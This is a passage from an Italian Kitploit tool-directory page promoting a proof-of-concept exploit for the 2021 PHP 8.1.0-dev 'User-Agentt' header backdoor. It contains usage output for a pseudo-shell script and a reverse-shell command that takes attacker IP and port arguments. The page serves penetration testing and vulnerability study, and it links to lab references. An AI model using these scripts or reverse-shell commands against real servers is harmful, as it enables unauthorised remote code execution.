Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
php-8.1.0-dev-backdoor-rce — Script Backdoor per la Shell di Sistema PHP 8.1.0-dev | Kitploit
Strumenti/GitHubGitHub/flast101/php-8.1.0-dev-backdoor-rce
ExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingStrumento di Accesso Remoto
GitHubflast101/php-8.1.0-dev-backdoor-rce

php-8.1.0-dev-backdoor-rce

Script Backdoor per la Shell di Sistema PHP 8.1.0-dev

Vedi Repository
94215 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Backdoor PHP 8.1.0-dev Esecuzione Remota di Codice

Script di shell di sistema backdoor PHP 8.1.0-dev

docs/logo_php81.png

La versione 8.1.0-dev di PHP è stata rilasciata con una backdoor il 28 marzo 2021, ma la backdoor è stata rapidamente scoperta e rimossa. Se questa versione di PHP è in esecuzione su un server, un attaccante può eseguire codice arbitrario inviando l'header User-Agentt.

Il codice originale è stato ripristinato dopo la scoperta del problema, ma è stato poi manomesso una seconda volta. La violazione avrebbe creato una backdoor in tutti i siti web che eseguivano la versione compromessa di PHP, consentendo agli hacker di eseguire codice in remoto sul sito.

Leggi l'articolo completo: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/


Script POC

Questo breve script di exploit backdoor_php_8.1.0-dev.py usa la backdoor per fornire una pseudo shell di sistema sull'host.Trovalo su Exploit DB.

  • Titolo Exploit: Backdoor PHP 8.1.0-dev Esecuzione Remota di Codice
  • Data: 23 maggio 2021
  • Autore Exploit: flast101
  • Homepage del fornitore: https://www.php.net/
  • Link del software: https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor
  • Testato su versione: 8.1.0-dev
  • CVE : N/A
  • Riferimenti della vulnerabilità:
    https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
    https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md

Utilizzo:

root@kitploit:~
┌──(user㉿kali)-[~/Documents]
└─$ python3 backdoor_php_8.1.0-dev.py
  
Enter the host url:
http://a.b.c.d

Interactive shell is opened on http://a.b.c.d 
Can't acces tty; job crontol turned off.
$ id
uid=1000(user) gid=1000(user) groups=1000(user)

Reverse Shell

Questo breve script di exploit revshell_php_8.1.0-dev.py fornisce una reverse shell sul target.

Utilizzo:

root@kitploit:~
┌──(user㉿kali)-[~/Documents]
└─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

docs/revshell-script.png

Sii Curioso, Imparare è Vita ! 😃

Scarica lo strumento